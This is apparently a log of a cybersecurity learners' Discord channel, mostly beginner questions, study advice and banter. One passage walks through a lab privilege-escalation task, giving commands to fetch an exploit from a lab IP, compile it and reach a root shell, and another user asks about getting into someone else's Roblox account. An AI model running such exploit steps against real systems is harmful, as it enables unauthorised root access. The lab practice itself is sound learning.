#general

1 messages · Page 1728 of 1

sturdy sequoia
#

what fake bank?

blazing cloud
marsh lark
digital estuary
#

there are instructions im pretty sure

marsh lark
#

it should explain everything in the task

digital estuary
#

yeah

sturdy sequoia
#

lots of options

digital estuary
#

benji please send the message you've been typing for like 3-4 minutes

#

im craving to know what you wanted to send

#

DON'T LEAVE ME ON A CLIFFHANGER PLEASEEE

autumn escarp
#

hello to everyone reading this, this year i just completed my graduation and now working in a company as an android developer but other than this i have nothing to do after work so i am thinking of learning ethical hacking. I already have good understanding of programming and know a bit about cyber security and networking (i didn't pay much attention in college, just studied enough to pass it) and have a basic understanding of CLI, i have prev installed kali through vm in my laptop and worked on a RPI project in my company where i used ssh connection to configure file in the RPI. So the question is where should i start

sturdy sequoia
pine bison
#

Don't do this okay? have fun

digital estuary
digital estuary
# autumn escarp sorry pal

all good, sometimes im very curious what people type very long and I just want to know because people either type something else or never send the message

errant fossil
#

ello

blazing cloud
#

What is token

tall vine
sharp citrusBOT
marsh lark
blazing cloud
#

But where I can fin my token

marsh lark
blazing cloud
#

But where

marsh lark
digital estuary
marsh lark
blazing cloud
#

Oh ok

digital estuary
#

there

rapid merlin
# marsh lark

Y do people use light mode, does it have any benefit or simply they like it?

rapid merlin
#

Damn NotLikeThis

#

My eyes would burn NotLikeThis cri

blazing cloud
#

i dont have token

marsh lark
blazing cloud
#

yes

marsh lark
blazing cloud
#

no

marsh lark
#

what do you see?

blazing cloud
#

i see delet account and pasword and authentificator key

marsh lark
#

oops

#

edited, are you at that link?

blazing cloud
#

oh thanks

#

what if i share it

marsh lark
#

people can use it

blazing cloud
#

why

#

where people can use it

marsh lark
#

here

#

what they can do

#

is that

#

they ask a mod

blazing cloud
#

but dont have my account

marsh lark
#

ok

#

so

#

what happens

#

is that

#

someone asks a mod to unverify your account on this server

#

and they can verify with your discord token

blazing cloud
#

they block acces to verify my account

marsh lark
#

what do you mean?

blazing cloud
#

i cant verify if i share and someone use it

marsh lark
#

exactly

blazing cloud
#

ok

rapid merlin
blazing cloud
#

can you send me room help

rapid merlin
blazing cloud
#

thx

silver sky
rapid merlin
silver sky
#

He ain't Dexter mate

rapid merlin
marsh lark
rapid merlin
#

Y would I need that points anyways they useless kekw

lilac fox
#

Can anyone help me solve this problem I am unable to do ssh login it keps timing out I am in virtual box vm with bridged adapter with openvpn

strong chasm
#

Hello! What's the point of finishing top 3 in Diamond League? Any perks or just a fun challenge to aim for?

marsh lark
strong chasm
south rain
#

guys i js completed linux fundementals the three rooms any ideas on what room to go on next for more linux?

marsh lark
south rain
#

ok

#

thanks

blissful current
rapid merlin
blissful current
blazing cloud
#

pass room help

#

anybody pass room help

stuck ridge
#

What room

#

Im on Cyber security 101👍

blazing cloud
#

room help

stuck ridge
#

I wonder What kind of stuffs hackers did before we made it illegal

sturdy sequoia
stuck ridge
#

Like befote hacking is illegal

#

What can hackers at that time possible do to the internet?

sturdy sequoia
#

same kinda stuff

#

there were even hackers before the internet

stuck ridge
#

What do they hacked if there is no internet?

sturdy sequoia
#

BBS's and phone systems

#

you used to have to connect to another computer by dialing their phone number

modern fox
stuck ridge
#

Oh

#

My brother is raging over forsaken 🥀

sturdy sequoia
#

is that a game?

stuck ridge
#

Ye, on roblox

#

Guys, do yall prefer dualboot linuz or just vm?

rapid merlin
#

After some experience u can dual boot

sturdy sequoia
#

i use natvie install and vms ((on different machines)

stuck ridge
#

Ok, i think i gonna dualboot it later ( i tried live boot before)

urban vale
#

Guys where i can find the eternal blue room

modern fox
#

relatable

rapid merlin
urban vale
twin ridgeBOT
#

Gave +1 Rep to @mortal ether (current: #221 - 44)

rapid merlin
#

am i the only one that has the general channel disapearing for no reason?

sturdy sequoia
#

It's normal for me

rapid merlin
#

probs just a bug then

fervent cove
#

Pin it

rapid merlin
modern fox
#

u aint gonna believe this

rapid merlin
rapid merlin
summer sandal
rapid merlin
cosmic pendant
#

hahaha

mortal ether
#

Chatgpt has been helping me with OPSEC

#

Feel free to use any of these for your next red team engagement. You're welcome

rapid merlin
#

My jellybean knows my password NotLikeThis psyDuck

#

badboi you fix my problems

#

thanks baby boy

cosmic pendant
mortal ether
#

One time password?

cosmic pendant
#

Yeah, or One Time Pad

#

uncrackable as long as you don't reuse them, that's the only rule basically

summer sandal
#

@split halo

cosmic pendant
#

That's enough THM for today

summer sandal
#

i think so

marsh lark
summer sandal
rapid merlin
#

Y u tagging them?

summer sandal
#

yes

rapid merlin
#

I asked y

summer sandal
#

is this a fbi interrogation or..

sturdy sequoia
#

this sever makes me feel so old

marsh lark
bleak quartz
summer sandal
bleak quartz
#

nvm fixed

buoyant pine
#

Can somebody help me with the "Linux Privilege Escalation - task 5"

I should use wget to get an exploit to the target, but it can't seem to finish. @cloud quiver

bleak quartz
#

@buoyant pine just use curl

#

curl -v -O http://10.21.31.66:8000/ofs.c

buoyant pine
buoyant pine
fervent cove
#

well try simplehttpserver

bleak quartz
#

also u can prob just copy the script if you're feeling lazy, you don't even gotta move it. But I'll try anyways

fervent cove
#

also just server on a different port

#

to test

buoyant pine
#

What i find strange is that i makes the connection but just doesn't download it.

bleak quartz
#

try specifying the download

#

-O should grab the current one but try putting -o exploit.c

#

at the end

#

worked for me lol

#

@buoyant pine

#

just hos ton port 80

#

sudo python -m http.server 80

tropic moon
#

hi

bleak quartz
#

Also u can just do nano exploit.c or wtv and copy it there

#

then just compiled it wit h
gcc exploit.c -o exploit

#

$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library

whoami

root

#

there

#

:)

bleak quartz
tropic moon
#

can i learn ethical hacking with this spec

#

System Manufacturer: Lenovo

System Model: 81F5

Operating System: Windows 10 Pro 64-bit (10.0, Build 18363)

Language: English (Regional Setting: English)

BIOS: InsydeH20 Version 05.11.347UCN21WW(V1.10_ELCOT.1)

Processor (CPU): AMD PRO A4-4350B R4, 5 Compute Cores 2C+3G (~2.5 GHz)

Memory (RAM): 4096 MB (4 GB)

Page File: 164 MB used, 5614 MB available

DirectX Version: DirectX 12

bleak quartz
#

if things don't work usually brute-force doesn't help you need to find another way

bleak quartz
buoyant pine
#

i'll give it a try, thx

rapid merlin
bleak quartz
tropic moon
marsh lark
bleak quartz
fervent cove
#

yeah ur laptop will light on fire

bleak quartz
#

but as I said

tropic moon
bleak quartz
#

work with what u got

tropic moon
bleak quartz
#

Yeah, just don't run any extra vms

fervent cove
#

high chance low amount of fire

tropic moon
#

i can go on right?

tropic moon
blissful current
#

Virtual Machines

tropic moon
#

iam new in this thats why

#

iam refering udemy course

#

zero to hero ethical hacking cource

summer sandal
tropic moon
stuck ridge
#

Its free👍

summer sandal
#

but the beggining is free

stuck ridge
#

Huh?

tropic moon
#

so i can manage it in my spec right

summer sandal
fervent cove
#

no, fire

tropic moon
#

like downloading kali linux like stuffs

summer sandal
#

so u can work in

#

it

tropic moon
#

k

#

any precuation

summer sandal
#

nop

tropic moon
#

u can suggest before entering to this field?

summer sandal
#

its just a site not a application

marsh lark
summer sandal
fervent cove
#

use Gentoo, easiest operatng system

summer sandal
#

new stuff

stuck ridge
#

Nah just nothing

tropic moon
#

if i get any doubt i will ask u , thanks

summer sandal
tropic moon
#

k

stuck ridge
#

Gonna take a 15 mins break after do my homework, then i gonna study thm

#

I think i should explore htb as well

blissful current
night peak
#

What ordinary people think about hacker
🥀 make illegal hacking
🥀Get cought by police
🥀Expecting to get hired in cyber security.

stuck ridge
#

My classmates always tell teacher to let me solve the problem even though i dont even know wth happening in their computer 😭🙏

night peak
stuck ridge
#

I cant anymore, they already knew that im studying IT😭

night peak
#

In dark psychology manipulation you have to play dumb because you're surrounded by idiots crowd

stuck ridge
#

I tried to act like i dont care i just sitting there and chill. But my friend will tell teacher to let me solve the problem, dang😭

sturdy sequoia
#

you can say no

stuck ridge
#

Ye i said "Uhm, i cant solve that provlem sir"

rapid merlin
#

Anyone else’s dog sit up like a human

stuck ridge
night peak
#

😂😂

rapid merlin
rapid merlin
nocturne cedar
#

Guys i tried to log in somewhere solely with my email and password (all were correct) but it said that it didnt work. Is it because i created an account with google?

stuck ridge
#

Bru its nornal

manic needle
#

Hey, anyone here from Bengaluru? Looking to connect with local learners and practice together.

night peak
blissful current
stuck ridge
rapid merlin
manic needle
#

nobody knows im using proxy buddy

stuck ridge
night peak
manic needle
#

oh well i wanted to know whether you guys are mastered or learners in ethical hacking

stuck ridge
#

Tryhackme im learning from that

nocturne cedar
stuck ridge
#

"We are hackers. We arr the 1%" -Overthewire

fervent cove
sturdy sequoia
#

the 1% of what?

stuck ridge
#

Welp idk man

nocturne cedar
stuck ridge
#

Thats just the quote from overthewire

nocturne cedar
#

But i just tried it to log in with email solely

manic needle
#

like where do u learn here i just joined this server so thats why anyways im not a beginner u can consider me an amateur

nocturne cedar
#

Even tho i typed everything correct it didnt work

fervent cove
#

bc u need to use the sign in with gogle option

nocturne cedar
#

Ok good

fervent cove
#

thm doesnt stored ur credentials its federation

nocturne cedar
#

I was testing if i remember my password lol

manic needle
#

i meant on the server

nocturne cedar
#

@fervent cove so google automatically logs in

sturdy sequoia
fervent cove
#

no

#

it only automatically logs in if u have it saved in that browser

sick maple
#

yhh it's really good

nocturne cedar
#

@fervent cove if i create an account (with email only) is my password shown somewhere in the website's database?

sick maple
#

sure buddy

stuck ridge
night peak
rapid merlin
night peak
#

Born 2010-2011

sick maple
#

hello badboi 👋

rapid merlin
stuck ridge
#

Dang

sick maple
rapid merlin
#

Anything interesting to tell me😏 ?

ripe sleet
rapid merlin
rapid merlin
sick maple
ripe sleet
rapid merlin
sick maple
ripe sleet
#

I got a lot to do and don't feel like doing it

sick maple
ripe sleet
sick maple
#

hru

blissful current
rapid merlin
blissful current
ripe sleet
rapid merlin
blissful current
rapid merlin
night peak
rapid merlin
rapid merlin
rapid merlin
#

Is that an anime?

night peak
ripe sleet
rapid merlin
#

The anime me watching

rapid merlin
rapid merlin
ripe sleet
rapid merlin
#

Nobody's gonna know

ripe sleet
rapid merlin
rapid merlin
night peak
rapid merlin
ripe sleet
#

It's just a paper

echo fiber
#

Hello chat

rapid merlin
#

Hello shadow.

sick maple
stuck ridge
#

Im on window 11 and they made me to leanr in window 10😭

ripe sleet
echo fiber
#

Sup

bleak quartz
rain harness
#

hello i need some help for custom roming a Chinese rip off device is it possible?

merry rivet
#

Hey, I have a question. I'm almost through the Jr Penetration Tester path, and I thought I really had the fundamentals on lock. But what I found was that when trying the "easy" CTFs most of them seem almost impossible, and after I watch the walkthough I'm like this was never even in the modules. How did you guys get good at solving CTFs? Any tips?

night peak
digital estuary
night peak
# bleak quartz

This is what gonna happen if both person read the book of robert greene

stuck ridge
digital estuary
merry rivet
digital estuary
marble sleet
#

Hello I just get admission in bs cyber security in uni of Lahore
Can anyone guide me what or which skills should I learn first ?

merry rivet
twin ridgeBOT
#

Gave +1 Rep to @digital estuary (current: #139 - 67)

digital estuary
exotic hill
#

Hello everyone, i am new to this channel and i really need help. Actually i am a college student and want to pursue my career in cyber security. And for this i spend approx 4 months from which only 1-1.5 month were dedicated. I really enjoyed it. First I do some learning from the youtube itself, set up my kali machine then went for a very basic course on Udemy and then tried Try hack me (fundamental path and then Cyber security 101) and then ethical hacking course from TCM(borrowed from my friend (halfway)). But even after spending this much time i am not feeling like i know anything about it (and there is a possibility that it is true) and the main reason is i am unable to test my knowledge much and every time i went for some higher-level challenge i fail. That's not the actual problem, the problem is, as i mentioned that i am a college student and my college is making it harder for me to do anything but software development and coding. And i am confused if i should go for it or should stay at coding. One more thing, i saw certifications cost, it is not in my budget which is now one of the reasons for not going that way. Can anyone help me, telling what should i do, should i go for cyber or coding, is there any platform for low cost certification or anything that can help me....please. (And please don't mind if there is any English grammatical mistakes because English is not my native language)

rapid merlin
exotic hill
#

no bro, i wrote this manually

#

really

digital estuary
exotic hill
#

and i really need help

#

if anyone can

digital estuary
rapid merlin
exotic hill
#

Notes for like roadmap or something? Or you are asking about notes what i learned ?

digital estuary
rapid merlin
exotic hill
#

Yes, i took notes at every point

rapid merlin
#

Revising them?

digital estuary
#

Don't skim through material either, take your time to process what you're reading, it might take longer, but you end up memorizing better,
I'd suggest you to tap into the "Cornell Notes" system, You can write questions for future you to check your memory on a topic

merry rivet
digital estuary
#

With Cornell Notes you get a Summary, Questions / Key Points, The material itself

exotic hill
digital estuary
marble sleet
night peak
#

‎### Red Teaming Learning Path
‎* Red Team Fundamentals
‎* Red Team Threat Intel
‎* Red Team OPSEC
‎* Red Team Recon
‎* Weaponization
‎* Password Attacks
‎* Phishing
‎* Windows Privilege Escalation
‎* Lateral Movement and Pivoting
‎* Data Exfiltration
‎* Windows Internals
‎* AV Evasion: Shellcode Obfuscation
‎* Bypassing UAC
‎* Living Off the Land
‎* Network Security Solutions
‎* Firewalls
‎* Sandbox Evasion
‎* Active Directory Basics
‎* Breaching Active Directory
‎* Enumerating Active Directory
‎* Exploiting Active Directory

My quest to finish

digital estuary
frozen gull
#

before u go specific

#

u have to learn everything

night peak
rapid merlin
merry rivet
pliant bronze
night peak
pliant bronze
exotic hill
digital estuary
# exotic hill Cornell Notes ? Whats that?

It's a note taking system, you can learn more about it on youtube
You separate your paper note into 3 sections, A summary of the material, Questions or Key points, and the Notes themselves
You can also do it on obsidian which can make it even better honestly because you have endless space for the notes themselves and you can put it all under a header to drop it down or hide it

digital estuary
exotic hill
twin ridgeBOT
#

Gave +1 Rep to @digital estuary (current: #137 - 68)

pliant bronze
digital estuary
#

if you're talking about the THM subs

night peak
#

I don't wanna be indian movie actor my goal is to become threat actor

pliant bronze
merry rivet
pliant bronze
frozen gull
#

learn everything before u go specific

digital estuary
frozen gull
#

learn NIFT and stuff

exotic hill
#

Everybod says that certificates are very important in cyber sec, but i saw that the price for any subscription is too high, is there anything that i can do

pliant bronze
rapid merlin
digital estuary
#

And always make sure to see what certificates are good, it all depends on the country you're in

pliant bronze
night peak
rapid merlin
digital estuary
#

in India CEH is good iirc but anywhere outside its very bad, take what i say for a grain of salt but someone did mention it

marble sleet
pliant bronze
pliant bronze
merry rivet
frozen gull
#

youtube is enough for learning networking OS and programming

frozen gull
#

OSINT tools maybe

digital estuary
# exotic hill But CEH costs too high

check out paul jerimy's certification roadmap, has certs for all 8 security domains, you can check out what interests you the most
also has certs ordered by which ones are for beginner, intermediate, and advanced

frozen gull
#

hands on can be done on ur vms

twin ridgeBOT
#

Gave +1 Rep to @digital estuary (current: #136 - 69)

merry rivet
rapid merlin
#

@exotic hill follow some cybersecurity tech channels to stay updated in ur country

#

U must have some great youtubers

digital estuary
frozen gull
#

they have programming channels but not cybersec

rapid merlin
#

There should be someone doing cyber in India cri

frozen gull
#

follow madhat hacker , tyler ramsbey , john hammod , network chuck

#

they should be good enuf

rapid merlin
#

David bombal also

night peak
#

john hammod🔥

#

Hacker loid

frozen gull
stable pier
#

Madhat hacker seems like a channel made with the use of ai js to get make money

rapid merlin
stable pier
#

OH WAIT

#

that is a different channel

#

Mb

rapid merlin
#

What is mad hat

stable pier
#

YouTube it

rapid merlin
night peak
#

ahh 150k subscriber

rapid merlin
stable pier
frozen gull
#

learn web exploitation and active directory

frozen gull
quick blaze
#

Oh god..............

stable pier
#

He doesn't share anything

frozen gull
#

like 0 knowledge people

stable pier
#

Just uses buzz words

night peak
stable pier
#

@rapid merlin Do u know any good forums m

rapid merlin
stable pier
#

?

quick blaze
#

@digital estuary you twat...

frozen gull
digital estuary
rapid merlin
digital estuary
quick blaze
stable pier
quick blaze
stable pier
#

Tell m the dark web ones @rapid merlin

rapid merlin
digital estuary
quick blaze
quick blaze
#

The rest which are freely available are full of skids.

stable pier
#

Then im fine with the normal ones

#

Can u share them atleast

#

😭

night peak
stable pier
night peak
#

This forums is bad

#

i assume

rapid merlin
stable pier
#

THM isn't free though

rapid merlin
stable pier
#

Yes

rapid merlin
#

U just need to find it

stable pier
#

WHERE DO I GET IT FROM

quick blaze
night peak
rapid merlin
quick blaze
# stable pier Yes i do

Somebody please point this man to the free path blog post. I'm on mobile and I cannot find the link.

rapid merlin
digital estuary
rapid merlin
stable pier
#

Thanks

rapid merlin
night peak
rapid merlin
#

Like a team

night peak
twin ridgeBOT
#

Gave +1 Rep to @frozen hull (current: #424 - 17)

rapid merlin
#

It's always better in teams.

rapid merlin
stable pier
rapid merlin
rapid merlin
rapid merlin
stable pier
#

Also buying pixel 9 in 5 hours @rapid merlin

quick blaze
#

😐

rapid merlin
rapid merlin
stable pier
#

😭

stable pier
#

The other option is samsung s24

dark wolf
#

Get the iPhone 17 pro max

stable pier
#

I love how pixel looks

rapid merlin
night peak
rapid merlin
night peak
rapid merlin
dark wolf
#

Looks ALWAYS matter!

stable pier
#

Graphene OS, great camera, optimized software, looks, functionality

rapid merlin
stable pier
quick blaze
rapid merlin
stable pier
#

I have a redmi note 12 pro I'll root this one

frozen gull
dark wolf
frozen gull
#

they were top tier

#

new phones just suck

dark wolf
#

so hows THAT feature???

stable pier
#

My unc had one plus 3

frozen gull
#

69 cameras for no reason

stable pier
#

So OG

frozen gull
stable pier
frozen gull
#

the first ever one plus

rapid merlin
frozen gull
#

i loved the display

rapid merlin
rapid merlin
stable pier
#

Why don't girls ask for my number?

quick blaze
#

But all you really gotta do is be a sweetheart, or a heartthrob.

rapid merlin
dark wolf
#

It's not a matter of judging you for the phone you use, it's sizing you for initial contact, they want someone with money so you pretend to have it long enough to get their heart

quick blaze
frozen gull
#

me to girls who judge me by my phone

rapid merlin
sick lance
#

...Interesting.

rapid merlin
frozen gull
dark wolf
rapid merlin
#

@sick lance hi 👋

stable pier
#

Such a beautiful phone oh my god

sick lance
dark wolf
#

I never said this makes sense did i? Women don't make sense

rapid merlin
quick blaze
stable pier
rapid merlin
#

Ofcourse u do

quick blaze
quick blaze
rapid merlin
#

Hmmm.....

dark wolf
stable pier
quick blaze
frozen gull
#

they run on mood

#

not on brain

night peak
rapid merlin
stable pier
night peak
stable pier
#

I haven't even bought it dumbass what are u trying to expose me for😭😭😭

rapid merlin
#

Chill bro

stable pier
#

I think i also prefer japanese people ✅✅✅

night peak
frozen gull
rapid merlin
frozen gull
#

these phones wer good

#

this looks better than a apple phone no cap

stable pier
#

Yeaa

sick lance
stable pier
#

This looks like a realme phone more than one plus

sick lance
#

It's slightly off colour.

stable pier
#

Why did u copy me

sick lance
#

No, my PFP is better than yours, and I've been using it for years.

stable pier
#

Is urs a png?

night peak
#

Why you guys have depressed profile

sick lance
rapid merlin
stable pier
sick lance
#

Your PFP doesn't.

rapid merlin
sick lance
#

😉

stable pier
#

Because

#

My pfp exists

#

😅😅

sick lance
#

My PFP exsits.

#

You just can't see it.

stable pier
#

Ok show it

sick lance
#

Click it and view?

stable pier
#

Can't see it

sick lance
#

Doesn't mean it doesn't exist?

rapid merlin
#

@quick blaze

stable pier
#

Uh

#

Im an athiest

rapid merlin
#

Do we exist?

sick lance
#

You must not believe in Oxygen too then...

marsh lark
sick lance
#

Since you can't see that.

night peak
#

an i am NPC

rapid merlin
stable pier
#

You can see it with some scientific methods 🤔🤔

#

Like u know those thermal things

sick lance
#

You can see my PFP with your eyes.

stable pier
#

I can't

rapid merlin
#

Gravity was invented NotLikeThis psyDuck

sick lance
#

Which is biology, which is science?

rapid merlin
night peak
#

Small black hole pfp

stable pier
#

Starts jumping

rich jackal
#

Gravity is a push not a pull

celest dirge
#

Damn, this simulation is awful. These devs need to stop being lazy and patch a lot of bugs in this world, and nerf a lot of things.

stable pier
#

I want my phone asap
I want my phone asap
I want my phone asap
I want my phone asap

rapid merlin
stable pier
#

😂

sick lance
stable pier
rapid merlin
stable pier
sick lance
#

kek

sick maple
#

tf is going on?

stable pier
#

I pooped all over the server

night peak
sick lance
#

Anyway, Fortnite time, or Borderlands 4...

rapid merlin
#

2 invisible pfps fighting to decide who is more invisible kekw

stable pier
#

Fortnite in the big 2025...

#

😅😅😅

sick maple
stable pier
#

😅..

rapid merlin
stable pier
night peak
#

Look whenever they're sending messege the gravity text went up

stable pier
sick maple
#

@sick lance is better ngl

stable pier
#

No

rapid merlin
marsh lark
rapid merlin
stable pier
#

Fuck u snowie

sick maple
sick maple
sick lance
#

See.

#

Mine is better.

sick maple
stable pier
sick maple
rich jackal
#

Anyone rocking light mode, can goto hell lol j/k

stable pier
sick lance
rapid merlin
#

Scrubz won this contest

sick lance
sick maple
night peak
#

Let me put this ward

rapid merlin
sick maple
#

@sick lance 🏆

sick lance
#

It's a transparent image.

#

Jpeg y'all

stable pier
rapid merlin
stable pier
sick maple
sick lance
#

I'll add it to my collection.

rapid merlin
#

I would like to ship u this

sick maple
#

u copied his technique

rapid merlin
#

But u gotta pay shipping kekw

sick lance
#

I have a shipping code somewhere.

stable pier
rapid merlin
marsh lark
sick maple
sick maple
sick maple
rapid merlin
sick maple
stable pier
marsh lark
sick maple
stable pier
marsh lark
stable pier
sick maple
#

it's good

stable pier
#

I did

#

I keep changing

sick maple
stable pier
night peak
#

How to exit vim?

silver sky
#

You don't

#

Trapped forever

gusty inlet
stable pier
gusty inlet
#

I think that was the command.

stable pier
#

Change your name to jick sack @river garden

night peak
rapid merlin
#

@tropic moon don't send friend request without permission

#

N dm

#

Ask ur doubts here in thm general

#

If u can't send screenshots

#

Verify

sharp citrusBOT
dull bough
#

Erm hi guys im so so soryy for disturbing but does somebody know how to enter a roblox acc (i know its a dumb question 😔)

sick maple
dull bough
#

Sadly nothing i tried worked not even roblox support helped

rapid merlin
night peak
#

Are u girl

dull bough
#

Yea

rapid merlin
stable pier
#

😭😭😭😭

rapid merlin
#

Report it to tiktok coolguy

stable pier
river garden
dull bough
#

Hahaha also sadly thats my friends acc from 2018 or earlier and she didnt have a problem loging in untill last night

upper ginkgo
rapid merlin
#

@dull bough sdrian i suggest u be careful who u mess with cursed

stuck ridge
#

Damn i just realized i jumped from pre cyber to cyber 101😭

stuck ridge
#

I gonna have to go back and learn bru

silver sky
rapid merlin
#

U got it

dull bough
#

She was nice to most pepole and she didnt know anybody that would do that

stuck ridge
#

👍 coolguy

dull bough
#

I only knew one hacker snd he almost got my acc but i was able to get it back

dark wolf
night peak
stable pier
#

How are u jack

#

Long time

summer sandal
#

@gusty inlet isnt that against the rules

gusty inlet
#

Use the built in report that tiktok offers.

night peak
#

Thats illegal here

silver sky
#

sighs

stable pier
#

Why's the eagle ill😂😂😂😂🤣🤣🤣🤣😂😅

summer sandal
night peak
#

Illeagle

stable pier
summer sandal
dark wolf
stable pier
summer sandal
#

is ts tuff in whatever country🥀

stable pier
#

Bro

#

I am lazy ass fuck

#

I wait till my phone pops up the notification that says ur phone will be switched off in 30 seconds

rapid merlin
rapid merlin
#

New species?

night peak
#

Verb

sick maple
night peak
sick maple
rapid merlin
#

I'm scared of them now psyDuck NotLikeThis cri

deep merlin
#

Damn, everything on the website is painfully slow and unstable today. 😥

rose creek
#

do you think doing hacking in public is weird

summer sandal
rose creek
#

ok thank you because i was going to go to a coffee shop and do some red and rooms

nocturne minnow
#

hi guys

summer sandal
#

hey

rose creek
#

hey guys

celest dirge
#

Ohh, welp

#

Whoever sent the pyramid thing, try again

dark wolf
#

ferric oxide

rose creek
#

any good boxs to learn on

rapid merlin
#

Meaning

rose creek
#

my bad i came from HTB modules

rapid merlin
rapid merlin
rapid merlin
rose creek
#

yes i am always going back and furthor to do both is to grow i am 37 days strong i dont know if i am getting better tho

dark wolf
#

well it takes a year

dark wolf
#

not a couple monhts

summer sandal
rapid merlin
dark wolf
#

There are so many things the CTF can throw at you... to completely understand it, it takes a while to learn each topic

quick blaze
quick blaze
#

I'd like to believe that all our lives are entire jokes and we're within a magical orb as an advanced civilization's plaything / simulator.

summer sandal
quick blaze
#

@digital estuary Got hypothermic earlier, fucking hell.

summer sandal
#

wait

#

.

rapid merlin
quick blaze
#

How are you 0x8?

rose creek
quick blaze
quick blaze
#

Same goes for my head...

rapid merlin
rose creek
#

coffee

#

works

quick blaze
summer sandal
#

guys real question are we all sick like fr i feel like we are all sick those days

rapid merlin
quick blaze
#

I'm pretty resistant to cold naturally, isn't the first time I've faced hypothermia.

silver sky
#

All this terrible advice for hypothermia 😂

quick blaze
rose creek
#

hacker level is easy to get to

summer sandal
rapid merlin
dark wolf
#

Or the SARS

quick blaze
rapid merlin
#

Ur the first victim right?

quick blaze
#

silver sky
dark wolf
#

or the Gangrene

summer sandal
digital estuary
digital estuary
#

🥭 ?

quick blaze
# dark wolf or the Gangrene

Pretty sure..I don't..and I'm pretty sure..that'd sting pretty badly..and I'm pretty sure...I'd know if I had gangrene...

silver sky
#

Didn't realise we were full of doctors here.

summer sandal
digital estuary
summer sandal
digital estuary
#

sup hex hope you're doing well

rapid merlin
dark wolf
silver sky
silver sky
quick blaze
#

antiayaya...

digital estuary
quick blaze
summer sandal
blissful current
quick blaze
#

GG.

#

Aaron goes BOOM.

dark wolf
#

Either way I wasn't even diagnosing, I was suggesting, the follow up is due on the receiver to verify

rapid merlin
blissful current
silver sky
summer sandal
#

he blow gen alpha

quick blaze
#

Hex...that's quite an allegation you're facing..

rapid merlin
#

Wot

quick blaze
summer sandal
rapid merlin
celest dirge
quick blaze
rapid merlin
celest dirge
quick blaze
#

I give my hypothermia 10 minutes to go away if it doesn't then I'm not gonna be very happy. cursed

rapid merlin
#

My bad sensei

loud marlin
celest dirge
quick blaze
quick blaze
celest dirge
#

Wow, hypothermia is rude.

quick blaze
rapid merlin
quick blaze
#

Such a sneaky little bitch.

rapid merlin
#

Was i destined to see itNotLikeThis psyDuck

summer sandal
tropic moon
#

How to verify to send img?

sharp citrusBOT
rapid merlin
#

Slow poke

rose creek
#

You guys need slow down typing

rapid merlin
rapid merlin
#

We can't type slowcri

summer sandal
#

absolute peak experience

#

rip uncle ter

celest dirge